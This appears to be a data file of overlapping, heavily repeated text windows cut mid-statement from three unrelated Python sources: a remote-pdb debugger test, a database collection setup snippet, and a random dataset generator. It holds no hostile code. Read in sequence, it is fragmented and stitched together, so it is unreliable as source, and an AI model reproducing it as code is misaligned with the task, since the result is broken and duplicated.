"\"-> print('{b2}')\") client.fh.write(b'quit\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') def test_redirect(): with TestProcess(sys.executable, __file__, 'daemon', 'test_redirect')",
"process_tests import TestSocket from process_tests import dump_on_error from process_tests import wait_for_strings from remote_pdb",
"wait_for_strings(proc.read, TIMEOUT, 'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'quit\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.')",
"x) if __name__ == '__main__': logging.basicConfig( level=logging.DEBUG, format='%(process)d %(asctime)s,%(msecs)05d %(name)s %(levelname)s %(message)s', datefmt=\"%x~%X\"",
"open at (.+):(.+),\", proc.read())[0] with TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT)) as client: with dump_on_error(client.read): wait_for_strings(proc.read,",
"import TestProcess from process_tests import TestSocket from process_tests import dump_on_error from process_tests import",
"host, port = re.findall(\"RemotePdb session open at (.+):(.+),\", proc.read())[0] with TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT))",
"in proc.read() def test_simple_break(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc: with dump_on_error(proc.read):",
"'RemotePdb session open at ') host, port = re.findall(\"RemotePdb session open at (.+):(.+),\",",
"assert 'Restoring streams' not in proc.read() def test_simple_break(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple')",
"test_redirect(): with TestProcess(sys.executable, __file__, 'daemon', 'test_redirect') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}',",
"') host, port = re.findall(\"RemotePdb session open at (.+):(.+),\", proc.read())[0] with TestSocket(socket.create_connection((host, int(port)),",
"dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}', 'RemotePdb session open at ') host, port =",
"re.findall(\"RemotePdb session open at (.+):(.+),\", proc.read())[0] with TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT)) as client: with",
"with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}', 'RemotePdb session open at ') host, port",
"TIMEOUT, 'Breakpoint', '{b2}') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"{=>\") wait_for_strings(proc.read, TIMEOUT,",
"'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'quit\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') def test_redirect():",
"print('{b2}')\") client.fh.write(b'quit\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') def test_redirect(): with TestProcess(sys.executable, __file__, 'daemon', 'test_redirect') as",
"client.fh.write(b'quit\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') def test_redirect(): with TestProcess(sys.executable, __file__, 'daemon', 'test_redirect') as proc:",
"print_function import logging import os import re import socket import sys import time",
"def test_redirect(): with TestProcess(sys.executable, __file__, 'daemon', 'test_redirect') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT,",
"= sys.argv[2] if test_name == 'test_simple': func_a() elif test_name == 'test_redirect': func_a(patch_stdstreams=True) time.sleep(TIMEOUT)",
"client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, 'Breakpoint', '{b2}') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(client.read,",
"'DIED.') assert 'Restoring streams' not in proc.read() def func_b(patch_stdstreams): print('{b1}') set_trace(patch_stdstreams=patch_stdstreams) print('{b2}') def",
"'DIED.') assert 'Restoring streams' not in proc.read() def test_simple_break(): with TestProcess(sys.executable, __file__, 'daemon',",
"client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring",
"print('{a1}') func_b(patch_stdstreams) print('{a2}') x = block('{a3} ?') print('{=> %s}' % x) if __name__",
"TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT)) as client: with dump_on_error(client.read): wait_for_strings(proc.read, TIMEOUT, 'accepted connection from') wait_for_strings(client.read,",
"def test_simple_break(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT,",
"at (.+):(.+),\", proc.read())[0] with TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT)) as client: with dump_on_error(client.read): wait_for_strings(proc.read, TIMEOUT,",
"'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"->",
"\"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.')",
"time from process_tests import TestProcess from process_tests import TestSocket from process_tests import dump_on_error",
"print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, 'Breakpoint', '{b2}') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n')",
"int(os.getenv('REMOTE_PDB_TEST_TIMEOUT', 10)) def test_simple(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc: with dump_on_error(proc.read):",
"from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n')",
"from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, 'Breakpoint', '{b2}') wait_for_strings(client.read,",
"import logging import os import re import socket import sys import time from",
"print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"{=>\") wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams' not in",
"process_tests import TestProcess from process_tests import TestSocket from process_tests import dump_on_error from process_tests",
"= block('{a3} ?') print('{=> %s}' % x) if __name__ == '__main__': logging.basicConfig( level=logging.DEBUG,",
"from process_tests import TestProcess from process_tests import TestSocket from process_tests import dump_on_error from",
"if test_name == 'test_simple': func_a() elif test_name == 'test_redirect': func_a(patch_stdstreams=True) time.sleep(TIMEOUT) else: raise",
"patch_stdstreams=False): print('{a1}') func_b(patch_stdstreams) print('{a2}') x = block('{a3} ?') print('{=> %s}' % x) if",
"%(message)s', datefmt=\"%x~%X\" ) test_name = sys.argv[2] if test_name == 'test_simple': func_a() elif test_name",
"connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\")",
"'__main__': logging.basicConfig( level=logging.DEBUG, format='%(process)d %(asctime)s,%(msecs)05d %(name)s %(levelname)s %(message)s', datefmt=\"%x~%X\" ) test_name = sys.argv[2]",
"'Breakpoint', '{b2}') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"{=>\") wait_for_strings(proc.read, TIMEOUT, 'DIED.')",
"from __future__ import print_function import logging import os import re import socket import",
"test_simple_break(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}',",
"wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams' not in proc.read() def test_simple_break(): with TestProcess(sys.executable,",
"print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert",
"os import re import socket import sys import time from process_tests import TestProcess",
"None, patch_stdstreams=False): print('{a1}') func_b(patch_stdstreams) print('{a2}') x = block('{a3} ?') print('{=> %s}' % x)",
"== '__main__': logging.basicConfig( level=logging.DEBUG, format='%(process)d %(asctime)s,%(msecs)05d %(name)s %(levelname)s %(message)s', datefmt=\"%x~%X\" ) test_name =",
"TIMEOUT, \"{=>\") wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams' not in proc.read() def test_simple_break():",
"streams' not in proc.read() def func_b(patch_stdstreams): print('{b1}') set_trace(patch_stdstreams=patch_stdstreams) print('{b2}') def func_a(block=lambda _: None,",
"test_name == 'test_simple': func_a() elif test_name == 'test_redirect': func_a(patch_stdstreams=True) time.sleep(TIMEOUT) else: raise RuntimeError('Invalid",
"TIMEOUT, '{a1}', '{b1}', 'RemotePdb session open at ') host, port = re.findall(\"RemotePdb session",
"from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'quit\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') def test_redirect(): with TestProcess(sys.executable,",
"'test_redirect') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}', 'RemotePdb session open at",
"if __name__ == '__main__': logging.basicConfig( level=logging.DEBUG, format='%(process)d %(asctime)s,%(msecs)05d %(name)s %(levelname)s %(message)s', datefmt=\"%x~%X\" )",
"import set_trace TIMEOUT = int(os.getenv('REMOTE_PDB_TEST_TIMEOUT', 10)) def test_simple(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple')",
"TestSocket from process_tests import dump_on_error from process_tests import wait_for_strings from remote_pdb import set_trace",
"with dump_on_error(client.read): wait_for_strings(proc.read, TIMEOUT, 'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'quit\\r\\n') wait_for_strings(proc.read,",
"int(port)), timeout=TIMEOUT)) as client: with dump_on_error(client.read): wait_for_strings(proc.read, TIMEOUT, 'accepted connection from') wait_for_strings(client.read, TIMEOUT,",
"'Restoring streams' not in proc.read() def test_simple_break(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as",
"set_trace(patch_stdstreams=patch_stdstreams) print('{b2}') def func_a(block=lambda _: None, patch_stdstreams=False): print('{a1}') func_b(patch_stdstreams) print('{a2}') x = block('{a3}",
"print('{a2}') x = block('{a3} ?') print('{=> %s}' % x) if __name__ == '__main__':",
"%(name)s %(levelname)s %(message)s', datefmt=\"%x~%X\" ) test_name = sys.argv[2] if test_name == 'test_simple': func_a()",
"wait_for_strings(client.read, TIMEOUT, 'Breakpoint', '{b2}') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"{=>\") wait_for_strings(proc.read,",
"timeout=TIMEOUT)) as client: with dump_on_error(client.read): wait_for_strings(proc.read, TIMEOUT, 'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"->",
"import socket import sys import time from process_tests import TestProcess from process_tests import",
"session open at (.+):(.+),\", proc.read())[0] with TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT)) as client: with dump_on_error(client.read):",
"assert 'Restoring streams' not in proc.read() def func_b(patch_stdstreams): print('{b1}') set_trace(patch_stdstreams=patch_stdstreams) print('{b2}') def func_a(block=lambda",
"level=logging.DEBUG, format='%(process)d %(asctime)s,%(msecs)05d %(name)s %(levelname)s %(message)s', datefmt=\"%x~%X\" ) test_name = sys.argv[2] if test_name",
"remote_pdb import set_trace TIMEOUT = int(os.getenv('REMOTE_PDB_TEST_TIMEOUT', 10)) def test_simple(): with TestProcess(sys.executable, __file__, 'daemon',",
"= int(os.getenv('REMOTE_PDB_TEST_TIMEOUT', 10)) def test_simple(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc: with",
"TIMEOUT, 'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'quit\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') def",
"from process_tests import dump_on_error from process_tests import wait_for_strings from remote_pdb import set_trace TIMEOUT",
"TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams' not in proc.read()",
"as client: with dump_on_error(client.read): wait_for_strings(proc.read, TIMEOUT, 'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\")",
"\"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"{=>\") wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams' not",
"as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}', 'RemotePdb session open at ')",
"import sys import time from process_tests import TestProcess from process_tests import TestSocket from",
"from process_tests import wait_for_strings from remote_pdb import set_trace TIMEOUT = int(os.getenv('REMOTE_PDB_TEST_TIMEOUT', 10)) def",
"print('{=> %s}' % x) if __name__ == '__main__': logging.basicConfig( level=logging.DEBUG, format='%(process)d %(asctime)s,%(msecs)05d %(name)s",
"func_b(patch_stdstreams) print('{a2}') x = block('{a3} ?') print('{=> %s}' % x) if __name__ ==",
"TestProcess(sys.executable, __file__, 'daemon', 'test_redirect') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}', 'RemotePdb",
"wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, 'Breakpoint', '{b2}') wait_for_strings(client.read, TIMEOUT,",
"_: None, patch_stdstreams=False): print('{a1}') func_b(patch_stdstreams) print('{a2}') x = block('{a3} ?') print('{=> %s}' %",
"dump_on_error from process_tests import wait_for_strings from remote_pdb import set_trace TIMEOUT = int(os.getenv('REMOTE_PDB_TEST_TIMEOUT', 10))",
"def func_b(patch_stdstreams): print('{b1}') set_trace(patch_stdstreams=patch_stdstreams) print('{b2}') def func_a(block=lambda _: None, patch_stdstreams=False): print('{a1}') func_b(patch_stdstreams) print('{a2}')",
"'daemon', 'test_redirect') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}', 'RemotePdb session open",
"set_trace TIMEOUT = int(os.getenv('REMOTE_PDB_TEST_TIMEOUT', 10)) def test_simple(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as",
"block('{a3} ?') print('{=> %s}' % x) if __name__ == '__main__': logging.basicConfig( level=logging.DEBUG, format='%(process)d",
"TIMEOUT, 'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT,",
"connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, 'Breakpoint', '{b2}')",
"datefmt=\"%x~%X\" ) test_name = sys.argv[2] if test_name == 'test_simple': func_a() elif test_name ==",
"\"{=>\") wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams' not in proc.read() def test_simple_break(): with",
"with TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT)) as client: with dump_on_error(client.read): wait_for_strings(proc.read, TIMEOUT, 'accepted connection from')",
"func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, 'Breakpoint', '{b2}') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT,"
]
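The second array shingles a complete test module for remote-pdb. Its windows overlap enough to deduplicate into a single file; the sketch below shows the imports, one representative test, the target functions, and the self-exec driver, with ordering and indentation inferred from window overlaps. `test_redirect` and `test_simple_break` (both visible in the fragments) follow the same connect-and-drive pattern, issuing `break func_a` / `continue` instead of `quit`:

```python
# Reassembly sketch of the shingled test module above (remote-pdb tests).
# Every statement is drawn from the windows; only layout is inferred.
from __future__ import print_function

import logging
import os
import re
import socket
import sys
import time

from process_tests import TestProcess
from process_tests import TestSocket
from process_tests import dump_on_error
from process_tests import wait_for_strings

from remote_pdb import set_trace

TIMEOUT = int(os.getenv('REMOTE_PDB_TEST_TIMEOUT', 10))


def test_simple():
    # Spawn this very file as a daemon, wait for the RemotePdb banner,
    # connect over a raw socket, and drive the debugger with 'quit'.
    with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc:
        with dump_on_error(proc.read):
            wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}', 'RemotePdb session open at ')
            host, port = re.findall("RemotePdb session open at (.+):(.+),", proc.read())[0]
            with TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT)) as client:
                with dump_on_error(client.read):
                    wait_for_strings(proc.read, TIMEOUT, 'accepted connection from')
                    wait_for_strings(client.read, TIMEOUT, "-> print('{b2}')")
                    client.fh.write(b'quit\r\n')
            wait_for_strings(proc.read, TIMEOUT, 'DIED.')


def func_b(patch_stdstreams):
    print('{b1}')
    set_trace(patch_stdstreams=patch_stdstreams)
    print('{b2}')


def func_a(block=lambda _: None, patch_stdstreams=False):
    print('{a1}')
    func_b(patch_stdstreams)
    print('{a2}')
    x = block('{a3} ?')
    print('{=> %s}' % x)


if __name__ == '__main__':
    logging.basicConfig(
        level=logging.DEBUG,
        format='%(process)d %(asctime)s,%(msecs)05d %(name)s %(levelname)s %(message)s',
        datefmt="%x~%X"
    )
    test_name = sys.argv[2]
    if test_name == 'test_simple':
        func_a()
    elif test_name == 'test_redirect':
        func_a(patch_stdstreams=True)
        time.sleep(TIMEOUT)
    else:
        raise RuntimeError('Invalid test spec %r.' % test_name)
    logging.info('DIED.')
```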
[
"Config, Database config = Config() database = Database(config) articles_collection = database.get_collection(\"articles\") results_collection =",
"import Config, Database config = Config() database = Database(config) articles_collection = database.get_collection(\"articles\") results_collection",
"Database config = Config() database = Database(config) articles_collection = database.get_collection(\"articles\") results_collection = database.get_collection(\"results\")",
"...kernel import Config, Database config = Config() database = Database(config) articles_collection = database.get_collection(\"articles\")",
"<gh_stars>1-10 from ...kernel import Config, Database config = Config() database = Database(config) articles_collection",
"from ...kernel import Config, Database config = Config() database = Database(config) articles_collection ="
]
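The third array is short enough to deduplicate mechanically: its six windows collapse to the module-level snippet below. Note that the relative `...kernel` import only resolves inside its original package, so this is a transcription of the shingled source rather than a standalone script:

```python
# Deduplicated transcription of the six windows above.
# Config and Database come from the source's own package.
from ...kernel import Config, Database

config = Config()
database = Database(config)
articles_collection = database.get_collection("articles")
results_collection = database.get_collection("results")
```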
[
"per run. # Typically you would want to generate at least 50 #",
"$ {0} 8 115 125 124.409 121.153 116.976 115.358 123.128 121.975 124.312 122.044",
"{}'.format(num)) print('# lower = {:.3f}'.format(lower)) print('# upper = {:.3f}'.format(upper)) print('# decimal places =",
"(c) 2016 by <NAME> import argparse import datetime import inspect import os import",
"That works because cmpds allows you to specify which column to read in",
"''' Write a warning message to stdout. ''' lineno = inspect.stack()[f][2] print('WARNING:{} {}'.format(lineno,",
"Write an error message to stderr and exit. ''' lineno = inspect.stack()[f][2] sys.stderr.write('ERROR:{}",
"warn(msg, f=1): ''' Write a warning message to stdout. ''' lineno = inspect.stack()[f][2]",
"2: generate a dataset that mocks runtimes between # 115 and 125 seconds",
"of the SND for analysis. $ {0} 8 115 125 124.409 121.153 116.976",
"1 116.212 2 122.327 3 118.571 4 120.238 5 124.852 6 119.652 7",
"= {}'.format(opts.decimal_places)) i = 0 for r in generate_dataset(num, lower, upper): if opts.decorate:",
"98 upper = 101 ''' for i in range(n): r = random.uniform(lower, upper)",
"generate a dataset that mocks runtimes between # 10 and 12 seconds with",
"to read in the dataset file. Typically you would want to generate at",
"least 50 elements to enable the use of the standard normal distribution (SND)",
"seconds with 2 decimal digits of precision. # Typically you would want to",
"you would want to generate at least 50 elements to enable the use",
"an info message to stdout. ''' lineno = inspect.stack()[f][2] print('INFO:{} {}'.format(lineno, msg)) def",
"# Example 1: help $ {0} -h # Example 2: generate a dataset",
"for r in generate_dataset(num, lower, upper): if opts.decorate: i += 1 f =",
"} return lookup.get(s, s) argparse._ = gettext # to capitalize help headers base",
"if opts.decorate: print('# date = {}'.format(datetime.datetime.now())) print('# num = {}'.format(num)) print('# lower =",
"standard normal distribution (SND) for analysis. ''' # License: MIT Open Source #",
"a header and record counts to make them easier to read. That works",
"and exit.\\n ', } return lookup.get(s, s) argparse._ = gettext # to capitalize",
"Typically you would want to generate at least 50 # elements to enable",
"{0} -h # Example 2: generate a dataset that mocks runtimes between #",
"help message and exit.\\n ', } return lookup.get(s, s) argparse._ = gettext #",
"action='count', help='''Increase the level of verbosity. ''') parser.add_argument('-V', '--version', action='version', version='%(prog)s v{0}'.format(VERSION), help=\"\"\"Show",
"upper = 101 ''' for i in range(n): r = random.uniform(lower, upper) yield",
"default is %(default)s. ''') parser.add_argument('-D', '--decorate', action='store_true', help='''Print header and line numbers. ''')",
"50 elements to enable the use of the standard normal distribution (SND) for",
"{} must be less than upper bound {}'.format(lower, upper)) if opts.decorate: print('# date",
"by <NAME> import argparse import datetime import inspect import os import random import",
"= opts.lower[0] upper = opts.upper[0] if lower > upper: err('lower bound {} must",
"upper): ''' Generate a datasets of n elements in the range [lower..upper]. A",
"create datasets to test cmpds. You can decorate the datasets with a header",
"argparse._ = gettext # to capitalize help headers base = os.path.basename(sys.argv[0]) name =",
"headers base = os.path.basename(sys.argv[0]) name = os.path.splitext(base)[0] usage = '\\n {0} [OPTIONS] <NUM>",
"10.000 # upper = 12.000 # decimal places = 2 1 10.30 2",
"'--verbose', action='count', help='''Increase the level of verbosity. ''') parser.add_argument('-V', '--version', action='version', version='%(prog)s v{0}'.format(VERSION),",
"'{{:>5}} {{:>10.{}f}}'.format(opts.decimal_places) print(f.format(i, r)) else: f = '{{:>10.{}f}}'.format(opts.decimal_places) print(f.format(r)) if __name__ == '__main__':",
"in a range for testing. It is used to create datasets to test",
"the SND for analysis. $ {0} -D 8 115 125 # date =",
"inspect.stack()[f][2] print('WARNING:{} {}'.format(lineno, msg)) def err(msg, f=1): ''' Write an error message to",
"of decimal places. The default is %(default)s. ''') parser.add_argument('-D', '--decorate', action='store_true', help='''Print header",
"stderr and exit. ''' lineno = inspect.stack()[f][2] sys.stderr.write('ERROR:{} {}\\n'.format(lineno, msg)) sys.exit(1) def getopts():",
"help=\"\"\"Show program's version number and exit. \"\"\") # Positional arguments at the end.",
"msg)) def warn(msg, f=1): ''' Write a warning message to stdout. ''' lineno",
"= opts.upper[0] if lower > upper: err('lower bound {} must be less than",
"= 50 lower = 98 upper = 101 ''' for i in range(n):",
"Source # Copyright (c) 2016 by <NAME> import argparse import datetime import inspect",
"''') parser.add_argument('-D', '--decorate', action='store_true', help='''Print header and line numbers. ''') parser.add_argument('-v', '--verbose', action='count',",
"[lower..upper]. A typical call might be something like: n = 50 lower =",
"the use of the SND for analysis. $ {0} -D 8 115 125",
"= 2 1 10.30 2 11.48 3 10.50 4 10.25 5 10.52 6",
"'USAGE:', 'optional arguments': 'OPTIONAL ARGUMENTS', 'show this help message and exit': 'Show this",
"argparse. ''' # Trick to capitalize the built-in headers. # Unfortunately I can't",
"= '{{:>5}} {{:>10.{}f}}'.format(opts.decimal_places) print(f.format(i, r)) else: f = '{{:>10.{}f}}'.format(opts.decimal_places) print(f.format(r)) if __name__ ==",
"num = 8 # lower = 115.000 # upper = 125.000 # decimal",
"between # 115 and 125 seconds per run and is decorated. # Typically",
"parser.add_argument('-D', '--decorate', action='store_true', help='''Print header and line numbers. ''') parser.add_argument('-v', '--verbose', action='count', help='''Increase",
"{}'.format(lineno, msg)) def warn(msg, f=1): ''' Write a warning message to stdout. '''",
"08:30:31.039108 # num = 6 # lower = 10.000 # upper = 12.000",
"msg)) def err(msg, f=1): ''' Write an error message to stderr and exit.",
"the standard normal distribution (SND) for analysis. ''' # License: MIT Open Source",
"you to specify which column to read in the dataset file. Typically you",
"base = os.path.basename(sys.argv[0]) name = os.path.splitext(base)[0] usage = '\\n {0} [OPTIONS] <NUM> <LOWER>",
"# decimal places = 3 1 116.212 2 122.327 3 118.571 4 120.238",
"Typically you would want to generate at least 50 elements to enable the",
"msg)) sys.exit(1) def getopts(): ''' Get the command line options using argparse. '''",
"''' Write an info message to stdout. ''' lineno = inspect.stack()[f][2] print('INFO:{} {}'.format(lineno,",
"number of decimal places. The default is %(default)s. ''') parser.add_argument('-D', '--decorate', action='store_true', help='''Print",
"upper = 125.000 # decimal places = 3 1 116.212 2 122.327 3",
"3: generate a dataset that mocks runtimes between # 115 and 125 seconds",
"inspect import os import random import sys VERSION = '0.1' def generate_dataset(n, lower,",
"<NAME> import argparse import datetime import inspect import os import random import sys",
"seconds per run and is decorated. # Typically you would want to generate",
"decimal places = {}'.format(opts.decimal_places)) i = 0 for r in generate_dataset(num, lower, upper):",
"generate_dataset(n, lower, upper): ''' Generate a datasets of n elements in the range",
"places = 2 1 10.30 2 11.48 3 10.50 4 10.25 5 10.52",
"lower = 98 upper = 101 ''' for i in range(n): r =",
"stdout. ''' lineno = inspect.stack()[f][2] print('INFO:{} {}'.format(lineno, msg)) def warn(msg, f=1): ''' Write",
"run and is decorated. # Typically you would want to generate at least",
"10.25 5 10.52 6 11.34 '''.format(base) afc = argparse.RawTextHelpFormatter parser = argparse.ArgumentParser(formatter_class=afc, description=desc[:-2],",
"parser.add_argument('upper', nargs=1, action='store', type=float, help='''The upper bound. ''') opts = parser.parse_args() return opts",
"be something like: n = 50 lower = 98 upper = 101 '''",
"{}\\n'.format(lineno, msg)) sys.exit(1) def getopts(): ''' Get the command line options using argparse.",
"the end. parser.add_argument('num', nargs=1, action='store', type=int, help='''The number of elements in the dataset.",
"12.000 # decimal places = 2 1 10.30 2 11.48 3 10.50 4",
"import os import random import sys VERSION = '0.1' def generate_dataset(n, lower, upper):",
"random floating point numbers in a range for testing. It is used to",
"= 0 for r in generate_dataset(num, lower, upper): if opts.decorate: i += 1",
"warning message to stdout. ''' lineno = inspect.stack()[f][2] print('WARNING:{} {}'.format(lineno, msg)) def err(msg,",
"= 12.000 # decimal places = 2 1 10.30 2 11.48 3 10.50",
"arguments': 'OPTIONAL ARGUMENTS', 'show this help message and exit': 'Show this help message",
"f=1): ''' Write an info message to stdout. ''' lineno = inspect.stack()[f][2] print('INFO:{}",
"= inspect.stack()[f][2] print('WARNING:{} {}'.format(lineno, msg)) def err(msg, f=1): ''' Write an error message",
"to stdout. ''' lineno = inspect.stack()[f][2] print('WARNING:{} {}'.format(lineno, msg)) def err(msg, f=1): '''",
"= inspect.stack()[f][2] sys.stderr.write('ERROR:{} {}\\n'.format(lineno, msg)) sys.exit(1) def getopts(): ''' Get the command line",
"121.153 116.976 115.358 123.128 121.975 124.312 122.044 # Example 3: generate a dataset",
"inspect.stack()[f][2] print('INFO:{} {}'.format(lineno, msg)) def warn(msg, f=1): ''' Write a warning message to",
"-d 2 6 10 12 # date = 2016-11-24 08:30:31.039108 # num =",
"for i in range(n): r = random.uniform(lower, upper) yield r def info(msg, f=1):",
"which column to read in the dataset file. Typically you would want to",
"to create datasets to test cmpds. You can decorate the datasets with a",
"# num = 8 # lower = 115.000 # upper = 125.000 #",
"> upper: err('lower bound {} must be less than upper bound {}'.format(lower, upper))",
"{0} 8 115 125 124.409 121.153 116.976 115.358 123.128 121.975 124.312 122.044 #",
"parser = argparse.ArgumentParser(formatter_class=afc, description=desc[:-2], usage=usage, epilog=epilog) parser.add_argument('-d', '--decimal-places', action='store', type=int, metavar=('NUMBER'), default=3, help='''The",
"'usage: ': 'USAGE:', 'optional arguments': 'OPTIONAL ARGUMENTS', 'show this help message and exit':",
"is %(default)s. ''') parser.add_argument('-D', '--decorate', action='store_true', help='''Print header and line numbers. ''') parser.add_argument('-v',",
"os.path.splitext(base)[0] usage = '\\n {0} [OPTIONS] <NUM> <LOWER> <UPPER>'.format(base) desc = 'DESCRIPTION:{0}'.format('\\n '.join(__doc__.split('\\n')))",
"num = opts.num[0] lower = opts.lower[0] upper = opts.upper[0] if lower > upper:",
"-D 8 115 125 # date = 2016-11-24 08:27:49.668509 # num = 8",
"to stderr and exit. ''' lineno = inspect.stack()[f][2] sys.stderr.write('ERROR:{} {}\\n'.format(lineno, msg)) sys.exit(1) def",
"7 116.400 8 122.446 # Example 4: generate a dataset that mocks runtimes",
"to enable the use of the standard normal distribution (SND) for analysis. '''",
"{0} -D 8 115 125 # date = 2016-11-24 08:27:49.668509 # num =",
"4: generate a dataset that mocks runtimes between # 10 and 12 seconds",
"import sys VERSION = '0.1' def generate_dataset(n, lower, upper): ''' Generate a datasets",
"parser.parse_args() return opts def main(): ''' Main entry point. ''' opts = getopts()",
"get rid of the \":\" reliably. def gettext(s): lookup = { 'usage: ':",
"opts def main(): ''' Main entry point. ''' opts = getopts() num =",
"decimal places = 3 1 116.212 2 122.327 3 118.571 4 120.238 5",
"enable the use of the SND for analysis. $ {0} -D 8 115",
"parser.add_argument('num', nargs=1, action='store', type=int, help='''The number of elements in the dataset. ''') parser.add_argument('lower',",
